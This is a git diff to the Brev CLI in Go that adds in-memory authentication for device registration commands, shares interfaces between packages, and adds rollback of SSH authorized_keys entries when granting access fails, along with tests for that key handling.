pkg/cmd/register/netbird.go | 19 +- pkg/cmd/register/providers.go | 11 +- pkg/cmd/register/register.go | 207 +++++++++++++----- pkg/cmd/register/register_test.go | 184 ++++++++++++++-- pkg/cmd/register/rpcclient.go | 12 +- pkg/cmd/register/rpcclient_test.go | 12 + pkg/cmd/register/sshkeys.go | 63 +++++- pkg/externalnode/types.go | 36 +++ pkg/store/memory_auth.go | 44 ++++ pkg/store/memory_auth_test.go | 73 ++++++ pkg/terminal/types.go | 11 + 23 files changed, 1015 insertions(+), 377 deletions(-) rename pkg/cmd/register/{registration_store.go => device_registration_store.go} (100%) rename pkg/cmd/register/{registration_store_test.go => device_registration_store_test.go} (100%) create mode 100644 pkg/externalnode/types.go create mode 100644 pkg/store/memory_auth.go create mode 100644 pkg/store/memory_auth_test.go create mode 100644 pkg/terminal/types.go diff --git a/pkg/auth/auth.go b/pkg/auth/auth.go index 61aa25ee3..f6bb68a17 100644 --- a/pkg/auth/auth.go +++ b/pkg/auth/auth.go @@ -114,6 +114,11 @@ func (t *Auth) WithAccessTokenValidator(val func(string) (bool, error)) *Auth { return t } +func (t *Auth) WithShouldLogin(fn func() (bool, error)) *Auth { + t.shouldLogin = fn + return t +} + // Gets fresh access token and prompts for login and saves to store func (t Auth) GetFreshAccessTokenOrLogin() (string, error) { token, err := t.GetFreshAccessTokenOrNil() diff --git a/pkg/cmd/cmd.go b/pkg/cmd/cmd.go index 07768d68b..eb7ec2e96 100644 --- a/pkg/cmd/cmd.go +++ b/pkg/cmd/cmd.go @@ -255,12 +255,33 @@ func NewBrevCommand() *cobra.Command { //nolint:funlen,gocognit,gocyclo // defin cmds.SetUsageTemplate(usageTemplate) - createCmdTree(cmds, t, loginCmdStore, noLoginCmdStore, loginAuth) + // In-memory auth for external node commands — never touches credentials.json. + memAuthStore := store.NewMemoryAuthStore() + memAuthenticator := auth.StandardLogin("", "", nil) + memLoginAuth := auth.NewLoginAuth(memAuthStore, memAuthenticator) + memLoginAuth.WithShouldLogin(func() (bool, error) { return true, nil }) + + externalNodeCmdStore := fsStore.WithNoAuthHTTPClient( + store.NewNoAuthHTTPClient(conf.GetBrevAPIURl()), + ).WithAuth(memLoginAuth, store.WithDebug(conf.GetDebugHTTP())) + + err = externalNodeCmdStore.SetForbiddenStatusRetryHandler(func() error { + _, err1 := memLoginAuth.GetAccessToken() + if err1 != nil { + return breverrors.WrapAndTrace(err1) + } + return nil + }) + if err != nil { + fmt.Printf("%v\n", err) + } + + createCmdTree(cmds, t, loginCmdStore, noLoginCmdStore, loginAuth, externalNodeCmdStore) return cmds } -func createCmdTree(cmd *cobra.Command, t *terminal.Terminal, loginCmdStore *store.AuthHTTPStore, noLoginCmdStore *store.AuthHTTPStore, loginAuth *auth.LoginAuth) { //nolint:funlen // define brev command +func createCmdTree(cmd *cobra.Command, t *terminal.Terminal, loginCmdStore *store.AuthHTTPStore, noLoginCmdStore *store.AuthHTTPStore, loginAuth *auth.LoginAuth, externalNodeCmdStore *store.AuthHTTPStore) { //nolint:funlen // define brev command cmd.AddCommand(set.NewCmdSet(t, loginCmdStore, noLoginCmdStore)) cmd.AddCommand(ls.NewCmdLs(t, loginCmdStore, noLoginCmdStore)) cmd.AddCommand(org.NewCmdOrg(t, loginCmdStore, noLoginCmdStore)) @@ -308,10 +329,10 @@ func createCmdTree(cmd *cobra.Command, t *terminal.Terminal, loginCmdStore *stor cmd.AddCommand(reset.NewCmdReset(t, loginCmdStore, noLoginCmdStore)) cmd.AddCommand(profile.NewCmdProfile(t, loginCmdStore, noLoginCmdStore)) cmd.AddCommand(refresh.NewCmdRefresh(t, loginCmdStore)) - cmd.AddCommand(register.NewCmdRegister(t, loginCmdStore)) - cmd.AddCommand(deregister.NewCmdDeregister(t, loginCmdStore)) - cmd.AddCommand(enablessh.NewCmdEnableSSH(t, loginCmdStore)) - cmd.AddCommand(grantssh.NewCmdGrantSSH(t, loginCmdStore)) + cmd.AddCommand(register.NewCmdRegister(t, externalNodeCmdStore)) + cmd.AddCommand(deregister.NewCmdDeregister(t, externalNodeCmdStore)) + cmd.AddCommand(enablessh.NewCmdEnableSSH(t, externalNodeCmdStore)) + cmd.AddCommand(grantssh.NewCmdGrantSSH(t, externalNodeCmdStore)) cmd.AddCommand(runtasks.NewCmdRunTasks(t, noLoginCmdStore)) cmd.AddCommand(proxy.NewCmdProxy(t, noLoginCmdStore)) cmd.AddCommand(healthcheck.NewCmdHealthcheck(t, noLoginCmdStore)) @@ -531,4 +552,5 @@ var ( _ store.Auth = auth.LoginAuth{} _ store.Auth = auth.NoLoginAuth{} _ auth.AuthStore = store.FileStore{} + _ auth.AuthStore = &store.MemoryAuthStore{} ) diff --git a/pkg/cmd/deregister/deregister.go b/pkg/cmd/deregister/deregister.go index 2d3546f6a..2cb8d83d5 100644 --- a/pkg/cmd/deregister/deregister.go +++ b/pkg/cmd/deregister/deregister.go @@ -6,7 +6,6 @@ import ( "fmt" "os/user" - nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" "connectrpc.com/connect" @@ -14,6 +13,7 @@ import ( "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" "github.com/spf13/cobra" @@ -26,48 +26,29 @@ type DeregisterStore interface { GetAccessToken() (string, error) } -// PlatformChecker checks whether the current platform is supported. -type PlatformChecker interface { - IsCompatible() bool -} - -// Selector prompts the user to choose from a list of items. -type Selector interface { - Select(label string, items []string) string -} - -// NetBirdUninstaller uninstalls the NetBird network agent. -type NetBirdUninstaller interface { - Uninstall() error -} - -// NodeClientFactory creates ConnectRPC ExternalNodeService clients. -type NodeClientFactory interface { - NewNodeClient(provider register.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient -} - -// SSHKeyRemover removes Brev-managed SSH keys. +// SSHKeyRemover removes Brev-managed SSH keys and returns the lines removed. type SSHKeyRemover interface { - RemoveBrevKeys(u *user.User) error + RemoveBrevKeys(u *user.User) ([]string, error) } // brevSSHKeyRemover delegates to register.RemoveBrevAuthorizedKeys. type brevSSHKeyRemover struct{} -func (brevSSHKeyRemover) RemoveBrevKeys(u *user.User) error { - if err := register.RemoveBrevAuthorizedKeys(u); err != nil { - return fmt.Errorf("removing brev authorized keys: %w", err) +func (brevSSHKeyRemover) RemoveBrevKeys(u *user.User) ([]string, error) { + removed, err := register.RemoveBrevAuthorizedKeys(u) + if err != nil { + return nil, fmt.Errorf("removing brev authorized keys: %w", err) } - return nil + return removed, nil } // deregisterDeps bundles the side-effecting dependencies of runDeregister so // they can be replaced in tests. type deregisterDeps struct { - platform PlatformChecker - prompter Selector - netbird NetBirdUninstaller - nodeClients NodeClientFactory + platform externalnode.PlatformChecker + prompter terminal.Selector + netbird register.NetBirdManager + nodeClients externalnode.NodeClientFactory registrationStore register.RegistrationStore sshKeys SSHKeyRemover } @@ -76,7 +57,7 @@ func defaultDeregisterDeps(brevHome string) deregisterDeps { return deregisterDeps{ platform: register.LinuxPlatform{}, prompter: register.TerminalPrompter{}, - netbird: register.NetBirdManager{}, + netbird: register.Netbird{}, nodeClients: register.DefaultNodeClientFactory{}, registrationStore: register.NewFileRegistrationStore(brevHome), sshKeys: brevSSHKeyRemover{}, @@ -87,7 +68,7 @@ var ( deregisterLong = `Deregister your device from NVIDIA Brev This command removes the local registration data and optionally uninstalls -NetBird (network agent).` +the Brev tunnel (network agent).` deregisterExample = ` brev deregister` ) @@ -158,28 +139,35 @@ func runDeregister(ctx context.Context, t *terminal.Terminal, s DeregisterStore, t.Vprint("") // Remove Brev SSH keys from authorized_keys. - u, err := user.Current() + osUser, err := user.Current() if err != nil { t.Vprintf(" Warning: could not determine current user for SSH key cleanup: %v\n", err) } else { - if err := deps.sshKeys.RemoveBrevKeys(u); err != nil { - t.Vprintf(" Warning: failed to remove Brev SSH keys: %v\n", err) - } else { - t.Vprint(t.Green(" Brev SSH keys removed from authorized_keys.")) + removed, kerr := deps.sshKeys.RemoveBrevKeys(osUser) + switch { + case kerr != nil: + t.Vprintf(" Warning: failed to remove Brev SSH keys: %v\n", kerr) + case len(removed) > 0: + t.Vprint(t.Green(" Brev SSH keys removed from authorized_keys:")) + for _, key := range removed { + t.Vprintf(" - %s\n", key) + } + default: + t.Vprint(" No Brev SSH keys found in authorized_keys.") } } t.Vprint("") - removeNetbird := deps.prompter.Select( - "Would you also like to uninstall NetBird?", - []string{"Yes, uninstall NetBird", "No, keep NetBird installed"}, + removeTunnel := deps.prompter.Select( + "Would you also like to remove the Brev tunnel?", + []string{"Yes, remove Brev tunnel", "No, keep Brev tunnel installed"}, ) - if removeNetbird == "Yes, uninstall NetBird" { - t.Vprint("Removing NetBird...") + if removeTunnel == "Yes, remove Brev tunnel" { + t.Vprint("Removing Brev tunnel...") if err := deps.netbird.Uninstall(); err != nil { - t.Vprintf(" Warning: failed to uninstall NetBird: %v\n", err) + t.Vprintf(" Warning: failed to remove Brev tunnel: %v\n", err) } else { - t.Vprint(t.Green(" NetBird uninstalled.")) + t.Vprint(t.Green(" Brev tunnel removed.")) } t.Vprint("") } diff --git a/pkg/cmd/deregister/deregister_test.go b/pkg/cmd/deregister/deregister_test.go index 5a0dc1fed..20d2d2a5f 100644 --- a/pkg/cmd/deregister/deregister_test.go +++ b/pkg/cmd/deregister/deregister_test.go @@ -13,6 +13,7 @@ import ( "github.com/brevdev/brev-cli/pkg/cmd/register" "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" ) @@ -87,32 +88,31 @@ func (m mockSelector) Select(label string, items []string) string { return m.fn(label, items) } -type mockNetBirdUninstaller struct { +type mockNetBirdManager struct { called bool err error } -func (m *mockNetBirdUninstaller) Uninstall() error { - m.called = true - return m.err -} +func (m *mockNetBirdManager) Install() error { return m.err } +func (m *mockNetBirdManager) Uninstall() error { m.called = true; return m.err } type mockNodeClientFactory struct { serverURL string } -func (m mockNodeClientFactory) NewNodeClient(provider register.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { +func (m mockNodeClientFactory) NewNodeClient(provider externalnode.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { return register.NewNodeServiceClient(provider, m.serverURL) } type mockSSHKeyRemover struct { - called bool - err error + called bool + err error + removed []string } -func (m *mockSSHKeyRemover) RemoveBrevKeys(_ *user.User) error { +func (m *mockSSHKeyRemover) RemoveBrevKeys(_ *user.User) ([]string, error) { m.called = true - return m.err + return m.removed, m.err } // testDeregisterDeps returns deps with all side-effects stubbed. The @@ -132,7 +132,7 @@ func testDeregisterDeps(t *testing.T, svc *fakeNodeService, regStore register.Re } return "" }}, - netbird: &mockNetBirdUninstaller{}, + netbird: &mockNetBirdManager{}, nodeClients: mockNodeClientFactory{serverURL: server.URL}, registrationStore: regStore, sshKeys: &mockSSHKeyRemover{}, @@ -306,13 +306,13 @@ func Test_runDeregister_SkipsNetbirdUninstall(t *testing.T) { }, } - netbird := &mockNetBirdUninstaller{} + netbird := &mockNetBirdManager{} deps, server := testDeregisterDeps(t, svc, regStore) defer server.Close() deps.prompter = mockSelector{fn: func(label string, _ []string) string { - if label == "Would you also like to uninstall NetBird?" { - return "No, keep NetBird installed" + if label == "Would you also like to remove the Brev tunnel?" { + return "No, keep Brev tunnel installed" } return "Yes, proceed" }} @@ -325,84 +325,64 @@ func Test_runDeregister_SkipsNetbirdUninstall(t *testing.T) { } if netbird.called { - t.Error("NetBird uninstall should not be called when user declines") + t.Error("Brev tunnel uninstall should not be called when user declines") } } -func Test_runDeregister_CallsRemoveBrevKeys(t *testing.T) { - regStore := &mockRegistrationStore{ - reg: ®ister.DeviceRegistration{ - ExternalNodeID: "unode_abc", - DisplayName: "My Spark", - OrgID: "org_123", - }, - } - - store := &mockDeregisterStore{ - user: &entity.User{ID: "user_1"}, - home: "/home/testuser/.brev", - token: "tok", - } - - svc := &fakeNodeService{ - removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { - return &nodev1.RemoveNodeResponse{}, nil - }, - } - - sshKeys := &mockSSHKeyRemover{} - deps, server := testDeregisterDeps(t, svc, regStore) - defer server.Close() - deps.sshKeys = sshKeys - - term := terminal.New() - err := runDeregister(context.Background(), term, store, deps) - if err != nil { - t.Fatalf("runDeregister failed: %v", err) - } - - if !sshKeys.called { - t.Error("expected removeBrevKeys to be called during deregistration") - } -} +func Test_runDeregister_RemoveBrevKeysHandling(t *testing.T) { + tests := []struct { + name string + sshKeys *mockSSHKeyRemover + wantCalled bool + }{ + {"CallsRemoveBrevKeys", &mockSSHKeyRemover{}, true}, + {"FailureIsNonFatal", &mockSSHKeyRemover{err: fmt.Errorf("permission denied")}, true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } -func Test_runDeregister_RemoveBrevKeysFailureIsNonFatal(t *testing.T) { - regStore := &mockRegistrationStore{ - reg: ®ister.DeviceRegistration{ - ExternalNodeID: "unode_abc", - DisplayName: "My Spark", - OrgID: "org_123", - }, - } + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } - store := &mockDeregisterStore{ - user: &entity.User{ID: "user_1"}, - home: "/home/testuser/.brev", - token: "tok", - } + svc := &fakeNodeService{ + removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + return &nodev1.RemoveNodeResponse{}, nil + }, + } - svc := &fakeNodeService{ - removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { - return &nodev1.RemoveNodeResponse{}, nil - }, - } + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + deps.sshKeys = tt.sshKeys - deps, server := testDeregisterDeps(t, svc, regStore) - defer server.Close() - deps.sshKeys = &mockSSHKeyRemover{err: fmt.Errorf("permission denied")} + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("runDeregister failed: %v", err) + } - term := terminal.New() - err := runDeregister(context.Background(), term, store, deps) - if err != nil { - t.Fatalf("expected deregister to succeed despite removeBrevKeys failure, got: %v", err) - } + if tt.sshKeys.called != tt.wantCalled { + t.Errorf("removeBrevKeys called = %v, want %v", tt.sshKeys.called, tt.wantCalled) + } - // Registration should still be cleaned up. - exists, err := regStore.Exists() - if err != nil { - t.Fatalf("Exists error: %v", err) - } - if exists { - t.Error("expected registration to be deleted even when SSH key cleanup fails") + // Registration should be cleaned up regardless of SSH key result. + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if exists { + t.Error("expected registration to be deleted") + } + }) } } diff --git a/pkg/cmd/enablessh/enablessh.go b/pkg/cmd/enablessh/enablessh.go index ce7efb8e8..e54b5b35a 100644 --- a/pkg/cmd/enablessh/enablessh.go +++ b/pkg/cmd/enablessh/enablessh.go @@ -8,7 +8,6 @@ import ( "os/exec" "os/user" - nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" "connectrpc.com/connect" @@ -16,6 +15,7 @@ import ( "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" "github.com/spf13/cobra" @@ -28,21 +28,11 @@ type EnableSSHStore interface { GetAccessToken() (string, error) } -// PlatformChecker checks whether the current platform is supported. -type PlatformChecker interface { - IsCompatible() bool -} - -// NodeClientFactory creates ConnectRPC ExternalNodeService clients. -type NodeClientFactory interface { - NewNodeClient(provider register.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient -} - // enableSSHDeps bundles the side-effecting dependencies of runEnableSSH so they // can be replaced in tests. type enableSSHDeps struct { - platform PlatformChecker - nodeClients NodeClientFactory + platform externalnode.PlatformChecker + nodeClients externalnode.NodeClientFactory registrationStore register.RegistrationStore } @@ -105,8 +95,8 @@ func runEnableSSH(ctx context.Context, t *terminal.Terminal, s EnableSSHStore, d func EnableSSH( ctx context.Context, t *terminal.Terminal, - nodeClients NodeClientFactory, - tokenProvider register.TokenProvider, + nodeClients externalnode.NodeClientFactory, + tokenProvider externalnode.TokenProvider, reg *register.DeviceRegistration, brevUser *entity.User, ) error { @@ -140,6 +130,11 @@ func EnableSSH( UserId: brevUser.ID, LinuxUser: linuxUser, })); err != nil { + if brevUser.PublicKey != "" { + if rerr := register.RemoveAuthorizedKey(u, brevUser.PublicKey); rerr != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to remove SSH key after failed grant: %v", rerr))) + } + } return fmt.Errorf("failed to enable SSH access: %w", err) } diff --git a/pkg/cmd/enablessh/enablessh_test.go b/pkg/cmd/enablessh/enablessh_test.go index 1048c8adf..ba5ec30f7 100644 --- a/pkg/cmd/enablessh/enablessh_test.go +++ b/pkg/cmd/enablessh/enablessh_test.go @@ -139,6 +139,33 @@ func Test_InstallAuthorizedKey_PreservesExistingKeys(t *testing.T) { } } +func Test_InstallAuthorizedKey_TagsExistingUntaggedKey(t *testing.T) { + u := tempUser(t) + + // Pre-seed a key without the brev-cli tag. + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte("ssh-rsa AAAA testkey\n"), 0o600); err != nil { + t.Fatal(err) + } + + // InstallAuthorizedKey should tag the existing key rather than adding a duplicate. + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("InstallAuthorizedKey: %v", err) + } + + content := readAuthorizedKeys(t, u) + if !strings.Contains(content, "ssh-rsa AAAA testkey "+register.BrevKeyComment) { + t.Errorf("expected existing key to be tagged with %q, got:\n%s", register.BrevKeyComment, content) + } + count := strings.Count(content, "ssh-rsa AAAA testkey") + if count != 1 { + t.Errorf("expected key to appear once, appeared %d times:\n%s", count, content) + } +} + // --- RemoveBrevAuthorizedKeys --- func Test_RemoveBrevAuthorizedKeys_RemovesTaggedKeys(t *testing.T) { @@ -159,10 +186,15 @@ func Test_RemoveBrevAuthorizedKeys_RemovesTaggedKeys(t *testing.T) { t.Fatal(err) } - if err := register.RemoveBrevAuthorizedKeys(u); err != nil { + removed, err := register.RemoveBrevAuthorizedKeys(u) + if err != nil { t.Fatalf("RemoveBrevAuthorizedKeys: %v", err) } + if len(removed) != 2 { + t.Errorf("expected 2 removed keys, got %d: %v", len(removed), removed) + } + result := readAuthorizedKeys(t, u) if strings.Contains(result, register.BrevKeyComment) { t.Errorf("brev keys still present:\n%s", result) @@ -178,9 +210,13 @@ func Test_RemoveBrevAuthorizedKeys_RemovesTaggedKeys(t *testing.T) { func Test_RemoveBrevAuthorizedKeys_NoopWhenFileDoesNotExist(t *testing.T) { u := tempUser(t) - if err := register.RemoveBrevAuthorizedKeys(u); err != nil { + removed, err := register.RemoveBrevAuthorizedKeys(u) + if err != nil { t.Fatalf("expected no error for missing file, got: %v", err) } + if len(removed) != 0 { + t.Errorf("expected no removed keys, got %v", removed) + } } func Test_RemoveBrevAuthorizedKeys_NoopWhenNoBrevKeys(t *testing.T) { @@ -195,9 +231,13 @@ func Test_RemoveBrevAuthorizedKeys_NoopWhenNoBrevKeys(t *testing.T) { t.Fatal(err) } - if err := register.RemoveBrevAuthorizedKeys(u); err != nil { + removed, err := register.RemoveBrevAuthorizedKeys(u) + if err != nil { t.Fatalf("RemoveBrevAuthorizedKeys: %v", err) } + if len(removed) != 0 { + t.Errorf("expected no removed keys, got %v", removed) + } result := readAuthorizedKeys(t, u) if result != original { @@ -205,7 +245,113 @@ func Test_RemoveBrevAuthorizedKeys_NoopWhenNoBrevKeys(t *testing.T) { } } -// --- Round-trip: install then remove --- +// --- RemoveAuthorizedKey (specific key removal) --- + +func Test_RemoveAuthorizedKey_RemovesOnlyTargetKey(t *testing.T) { + u := tempUser(t) + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + + content := strings.Join([]string{ + "ssh-rsa KEEP1 user@host", + "ssh-rsa TARGET " + register.BrevKeyComment, + "ssh-rsa KEEP2 admin@server", + "", + }, "\n") + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte(content), 0o600); err != nil { + t.Fatal(err) + } + + if err := register.RemoveAuthorizedKey(u, "ssh-rsa TARGET"); err != nil { + t.Fatalf("RemoveAuthorizedKey: %v", err) + } + + result := readAuthorizedKeys(t, u) + if strings.Contains(result, "TARGET") { + t.Errorf("target key still present:\n%s", result) + } + if !strings.Contains(result, "ssh-rsa KEEP1 user@host") { + t.Errorf("unrelated key was removed:\n%s", result) + } + if !strings.Contains(result, "ssh-rsa KEEP2 admin@server") { + t.Errorf("unrelated key was removed:\n%s", result) + } +} + +func Test_RemoveAuthorizedKey_NoopWhenKeyNotPresent(t *testing.T) { + u := tempUser(t) + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + + original := "ssh-rsa EXISTING user@host\n" + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte(original), 0o600); err != nil { + t.Fatal(err) + } + + if err := register.RemoveAuthorizedKey(u, "ssh-rsa NOTHERE"); err != nil { + t.Fatalf("RemoveAuthorizedKey: %v", err) + } + + result := readAuthorizedKeys(t, u) + if !strings.Contains(result, "ssh-rsa EXISTING user@host") { + t.Errorf("existing key was removed:\n%s", result) + } +} + +func Test_RemoveAuthorizedKey_NoopCases(t *testing.T) { + tests := []struct { + name string + key string + }{ + {"MissingFile", "ssh-rsa SOMEKEY"}, + {"EmptyKey", ""}, + {"WhitespaceKey", " "}, + } + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + u := tempUser(t) + if err := register.RemoveAuthorizedKey(u, tt.key); err != nil { + t.Fatalf("expected no error, got: %v", err) + } + }) + } +} + +func Test_RemoveAuthorizedKey_DoesNotRemoveOtherBrevKeys(t *testing.T) { + u := tempUser(t) + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + + content := strings.Join([]string{ + "ssh-rsa ALICE_KEY " + register.BrevKeyComment, + "ssh-rsa BOB_KEY " + register.BrevKeyComment, + "", + }, "\n") + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte(content), 0o600); err != nil { + t.Fatal(err) + } + + // Remove only Alice's key — Bob's should stay. + if err := register.RemoveAuthorizedKey(u, "ssh-rsa ALICE_KEY"); err != nil { + t.Fatalf("RemoveAuthorizedKey: %v", err) + } + + result := readAuthorizedKeys(t, u) + if strings.Contains(result, "ALICE_KEY") { + t.Errorf("Alice's key still present:\n%s", result) + } + if !strings.Contains(result, "ssh-rsa BOB_KEY") { + t.Errorf("Bob's key was removed:\n%s", result) + } +} + +// --- Round-trip: install then remove (all brev keys) --- func Test_InstallThenRemove_RoundTrip(t *testing.T) { u := tempUser(t) @@ -228,7 +374,7 @@ func Test_InstallThenRemove_RoundTrip(t *testing.T) { } // Remove all brev keys. - if err := register.RemoveBrevAuthorizedKeys(u); err != nil { + if _, err := register.RemoveBrevAuthorizedKeys(u); err != nil { t.Fatal(err) } @@ -240,3 +386,30 @@ func Test_InstallThenRemove_RoundTrip(t *testing.T) { t.Errorf("non-brev key was removed:\n%s", result) } } + +// --- Round-trip: install then rollback specific key --- + +func Test_InstallThenRemoveSpecificKey_RollbackScenario(t *testing.T) { + u := tempUser(t) + + // Install two brev keys (simulating two users granted access). + if err := register.InstallAuthorizedKey(u, "ssh-rsa ALICE"); err != nil { + t.Fatal(err) + } + if err := register.InstallAuthorizedKey(u, "ssh-rsa BOB"); err != nil { + t.Fatal(err) + } + + // Simulate rollback: remove only Bob's key (e.g. his grant RPC failed). + if err := register.RemoveAuthorizedKey(u, "ssh-rsa BOB"); err != nil { + t.Fatal(err) + } + + result := readAuthorizedKeys(t, u) + if strings.Contains(result, "BOB") { + t.Errorf("Bob's key still present after rollback:\n%s", result) + } + if !strings.Contains(result, "ssh-rsa ALICE") { + t.Errorf("Alice's key was removed during Bob's rollback:\n%s", result) + } +} diff --git a/pkg/cmd/grantssh/grantssh.go b/pkg/cmd/grantssh/grantssh.go index d2ba7789e..bea36fac1 100644 --- a/pkg/cmd/grantssh/grantssh.go +++ b/pkg/cmd/grantssh/grantssh.go @@ -10,7 +10,6 @@ import ( "path/filepath" "strings" - nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" "connectrpc.com/connect" @@ -18,6 +17,7 @@ import ( "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" "github.com/spf13/cobra" @@ -33,27 +33,12 @@ type GrantSSHStore interface { GetUserByID(userID string) (*entity.User, error) } -// PlatformChecker checks whether the current platform is supported. -type PlatformChecker interface { - IsCompatible() bool -} - -// Selector prompts the user to choose from a list of items. -type Selector interface { - Select(label string, items []string) string -} - -// NodeClientFactory creates ConnectRPC ExternalNodeService clients. -type NodeClientFactory interface { - NewNodeClient(provider register.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient -} - // grantSSHDeps bundles the side-effecting dependencies of runGrantSSH so they // can be replaced in tests. type grantSSHDeps struct { - platform PlatformChecker - prompter Selector - nodeClients NodeClientFactory + platform externalnode.PlatformChecker + prompter terminal.Selector + nodeClients externalnode.NodeClientFactory registrationStore register.RegistrationStore } @@ -96,6 +81,8 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep return fmt.Errorf("brev grant-ssh is only supported on Linux") } + removeCredentialsFile(t, s) + reg, err := getRegistration(deps) if err != nil { return breverrors.WrapAndTrace(err) @@ -110,11 +97,11 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep return err } - u, err := user.Current() + osUser, err := user.Current() if err != nil { return fmt.Errorf("failed to determine current Linux user: %w", err) } - linuxUser := u.Username + linuxUser := osUser.Username org, err := s.GetActiveOrganizationOrDefault() if err != nil { @@ -131,25 +118,18 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep } // Build selection list. - items := make([]string, len(orgMembers)) + usersToSelect := make([]string, len(orgMembers)) for i, r := range orgMembers { - items[i] = fmt.Sprintf("%s (%s)", r.user.Name, r.user.Email) + usersToSelect[i] = fmt.Sprintf("%s (%s)", r.user.Name, r.user.Email) } - selected := deps.prompter.Select("Select a user to grant SSH access:", items) + selected := deps.prompter.Select("Select a user to grant SSH access:", usersToSelect) // Find the selected user. - selectedIdx := -1 - for i, item := range items { - if item == selected { - selectedIdx = i - break - } - } - if selectedIdx < 0 { - return fmt.Errorf("selected item %q did not match any org member", selected) + selectedUser, err := getSelectedUser(usersToSelect, selected, orgMembers) + if err != nil { + return err } - selectedUser := orgMembers[selectedIdx].user t.Vprint("") t.Vprint(t.Green("Granting SSH access")) @@ -160,7 +140,7 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep t.Vprint("") if selectedUser.PublicKey != "" { - if err := register.InstallAuthorizedKey(u, selectedUser.PublicKey); err != nil { + if err := register.InstallAuthorizedKey(osUser, selectedUser.PublicKey); err != nil { t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) } else { t.Vprint(" Brev public key added to authorized_keys.") @@ -173,6 +153,11 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep UserId: selectedUser.ID, LinuxUser: linuxUser, })); err != nil { + if selectedUser.PublicKey != "" { + if rerr := register.RemoveAuthorizedKey(osUser, selectedUser.PublicKey); rerr != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to remove SSH key after failed grant: %v", rerr))) + } + } return fmt.Errorf("failed to grant SSH access: %w", err) } @@ -180,6 +165,48 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep return nil } +// checkSSHEnabled verifies that SSH has been enabled on this device by checking +// if the current user's public key is present in authorized_keys. +func checkSSHEnabled(currentUserPubKey string) error { + currentUserPubKey = strings.TrimSpace(currentUserPubKey) + if currentUserPubKey == "" { + return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + } + + u, err := user.Current() + if err != nil { + return fmt.Errorf("failed to determine current Linux user: %w", err) + } + + authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil { + return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + } + + if !strings.Contains(string(existing), currentUserPubKey) { + return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + } + + return nil +} + +func 